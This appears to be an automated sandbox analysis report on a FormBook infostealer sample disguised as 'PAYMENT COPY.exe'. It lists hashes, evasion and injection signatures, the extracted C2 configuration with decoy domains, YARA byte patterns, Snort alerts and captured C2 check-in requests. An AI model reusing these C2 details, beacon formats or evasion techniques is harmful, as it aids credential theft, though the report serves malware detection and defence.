Loading ...

Play interactive tourEdit tour

Analysis Report PAYMENT COPY.exe

Overview

General Information

Sample Name:PAYMENT COPY.exe
Analysis ID:385291
MD5:0cdbfdf044cfa1d810ed06b745ac9cd9
SHA1:124e5c370a103888227112141ea559b85ae17656
SHA256:8d85a4dbf755253e9f46aafa65f5374431e5843e6d1fa6ab61ef238919d9f6bb
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PAYMENT COPY.exe (PID: 6544 cmdline: 'C:\Users\user\Desktop\PAYMENT COPY.exe' MD5: 0CDBFDF044CFA1D810ED06B745AC9CD9)
    • PAYMENT COPY.exe (PID: 6592 cmdline: 'C:\Users\user\Desktop\PAYMENT COPY.exe' MD5: 0CDBFDF044CFA1D810ED06B745AC9CD9)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 6808 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6856 cmdline: /c del 'C:\Users\user\Desktop\PAYMENT COPY.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cursosdigitaisbr.com/eqas/"], "decoy": ["elitereliableservices.com", "mmidyat.com", "undergroundtreehouserecords.com", "kakavjesajt.com", "rainbowrichesonlineslots.com", "sportfest40.com", "doubletc.pro", "foothillvbc.com", "bergvarme-installasjon.com", "mural.institute", "thewanderingflamingo.com", "teacherautomation.com", "sunberry.icu", "sebastian249.com", "cjaccessories.net", "cantonpod.com", "successshogi.xyz", "labsaguniminuto.com", "trancetherapysessions.com", "beyoncos.com", "agasete.com", "mg-izkerr8.net", "theonyxaffect.com", "modala.net", "boardgameschronicle.com", "ateliemundodaju.com", "llmav.xyz", "friedlinefamily.com", "whizzx.com", "leadingbusinessstrategies.com", "holidayspreesweepstakes.com", "nescleanups.com", "byyann.com", "cupidwealthmanagement.com", "exactcoach.site", "35efb510815e.com", "cablepd.com", "brokearchives.com", "spazio-living.com", "quantize.fund", "mexicoaprende.online", "mireiaclua.com", "360caiyin.com", "sharprenovationsusa.com", "yomeformo.online", "onebasketball.team", "planchadoraautomatica.com", "huaguoxianflushing.com", "misskarenwnglishteacher.com", "pasta-pop.com", "kuihua0101.com", "gabrielesantoro.com", "healthtransformationnetwork.com", "comicexplosion.com", "ebikestore.online", "luewhhedre.com", "xn--vensmasajsalonu-1vb.com", "cazataxservices.com", "hotelmanagementtech.com", "curiget.xyz", "greenviewholidays.com", "casinobetdeals.com", "stripepayment.online", "shelfcorpsale.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.1.PAYMENT COPY.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.1.PAYMENT COPY.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.1.PAYMENT COPY.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        2.2.PAYMENT COPY.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.PAYMENT COPY.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: www.cursosdigitaisbr.com/eqas/Avira URL Cloud: Label: malware
          Source: http://www.cursosdigitaisbr.com/eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cursosdigitaisbr.com/eqas/"], "decoy": ["elitereliableservices.com", "mmidyat.com", "undergroundtreehouserecords.com", "kakavjesajt.com", "rainbowrichesonlineslots.com", "sportfest40.com", "doubletc.pro", "foothillvbc.com", "bergvarme-installasjon.com", "mural.institute", "thewanderingflamingo.com", "teacherautomation.com", "sunberry.icu", "sebastian249.com", "cjaccessories.net", "cantonpod.com", "successshogi.xyz", "labsaguniminuto.com", "trancetherapysessions.com", "beyoncos.com", "agasete.com", "mg-izkerr8.net", "theonyxaffect.com", "modala.net", "boardgameschronicle.com", "ateliemundodaju.com", "llmav.xyz", "friedlinefamily.com", "whizzx.com", "leadingbusinessstrategies.com", "holidayspreesweepstakes.com", "nescleanups.com", "byyann.com", "cupidwealthmanagement.com", "exactcoach.site", "35efb510815e.com", "cablepd.com", "brokearchives.com", "spazio-living.com", "quantize.fund", "mexicoaprende.online", "mireiaclua.com", "360caiyin.com", "sharprenovationsusa.com", "yomeformo.online", "onebasketball.team", "planchadoraautomatica.com", "huaguoxianflushing.com", "misskarenwnglishteacher.com", "pasta-pop.com", "kuihua0101.com", "gabrielesantoro.com", "healthtransformationnetwork.com", "comicexplosion.com", "ebikestore.online", "luewhhedre.com", "xn--vensmasajsalonu-1vb.com", "cazataxservices.com", "hotelmanagementtech.com", "curiget.xyz", "greenviewholidays.com", "casinobetdeals.com", "stripepayment.online", "shelfcorpsale.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PAYMENT COPY.exeVirustotal: Detection: 32%Perma Link
          Source: PAYMENT COPY.exeReversingLabs: Detection: 27%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 2.1.PAYMENT COPY.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.msdt.exe.51e7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.PAYMENT COPY.exe.2650000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.msdt.exe.e45378.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.2.PAYMENT COPY.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PAYMENT COPY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.360125493.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: PAYMENT COPY.exe, 00000002.00000002.379579567.0000000002750000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PAYMENT COPY.exe, 00000001.00000003.335333892.000000001F140000.00000004.00000001.sdmp, PAYMENT COPY.exe, 00000002.00000002.379228424.0000000000BCF000.00000040.00000001.sdmp, msdt.exe, 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PAYMENT COPY.exe, msdt.exe
          Source: Binary string: msdt.pdb source: PAYMENT COPY.exe, 00000002.00000002.379579567.0000000002750000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.360125493.0000000007CA0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,1_2_00405301
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,1_2_00405C94
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004026BC FindFirstFileA,1_2_004026BC
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 4x nop then pop edi2_2_0040C3C7
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 4x nop then pop edi2_1_0040C3C7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi5_2_00ADC3C7

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49723 -> 104.21.28.135:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49723 -> 104.21.28.135:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49723 -> 104.21.28.135:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 14.129.120.32:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 14.129.120.32:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 14.129.120.32:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.cursosdigitaisbr.com/eqas/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.llmav.xyz
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.cjaccessories.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=5vTDjg0AbqyZCldj/4uhpy3uniwA6wzjOzlj8Zy6y3xAduLQBKf0xYSENAev/AVhLePpE/aK2w==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.sportfest40.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.kakavjesajt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.cursosdigitaisbr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=ZOpWeYl13G0nYt67dVF2CnLu74JWwlwH6kqD7vFNiwsDSsXFN4+zplc98svsYfoyCRsuDbeIEw==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.llmav.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=+pdiEsaPT2Qcmu2ts2xxLdHpIsIAjIekwLbYEBSMYRvbotqJwTsf/hFk1ceM/lb+HZzWB3Gpcg==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.35efb510815e.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=vogt4SdM7257j7Tk1uEKvDVNcysLCgoPP/omvU9RbfjhJlgcGqamOKpa157N0oGBpfPcf/L32A==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.beyoncos.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.cjaccessories.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=5vTDjg0AbqyZCldj/4uhpy3uniwA6wzjOzlj8Zy6y3xAduLQBKf0xYSENAev/AVhLePpE/aK2w==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.sportfest40.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.kakavjesajt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.cursosdigitaisbr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=ZOpWeYl13G0nYt67dVF2CnLu74JWwlwH6kqD7vFNiwsDSsXFN4+zplc98svsYfoyCRsuDbeIEw==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.llmav.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=+pdiEsaPT2Qcmu2ts2xxLdHpIsIAjIekwLbYEBSMYRvbotqJwTsf/hFk1ceM/lb+HZzWB3Gpcg==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.35efb510815e.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=vogt4SdM7257j7Tk1uEKvDVNcysLCgoPP/omvU9RbfjhJlgcGqamOKpa157N0oGBpfPcf/L32A==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.beyoncos.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.cjaccessories.net
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: httpv2(13.12)Date: Mon, 12 Apr 2021 07:46:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 0a 3a 3a 73 65 6c 65 63 74 69 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 31 33 33 30 30 3b 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 7d 0a 3a 3a 2d 6d 6f 7a 2d 73 65 6c 65 63 74 69 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 31 33 33 30 30 3b 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 7d 0a 0a 62 6f 64 79 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 3b 0a 09 66 6f 6e 74 3a 20 31 33 70 78 2f 32 30 70 78 20 6e 6f 72 6d 61 6c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 63 6f 6c 6f 72 3a 20 23 34 46 35 31 35 35 3b 0a 7d 0a 0a 61 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 33 33 39 39 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 7d 0a 0a 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 39 70 78 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 34 70 78 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 34 70 78 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 0a 7d 0a 0a 63 6f 64 65 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 43 6f 75 72 69 65 72 20 4e 65 77 2c 20 43 6f 75 72 69 65 72 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 39 66 39 66 39 3b 0a 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 32 31 36 36 3b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 6d 61 72 67 69 6e 3a 20 31 34 70 78 20 30 20 31 34 70 78 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 32 70 78 20 31 30 70 78 20 31 32 70 78 20 31 30 70 78 3b 0a 7d 0a 0a 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 31 30 70 78 3b 0a 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 38 70
          Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpString found in binary or memory: http://181ue.com/sq.html?entry=
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000002.594277957.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
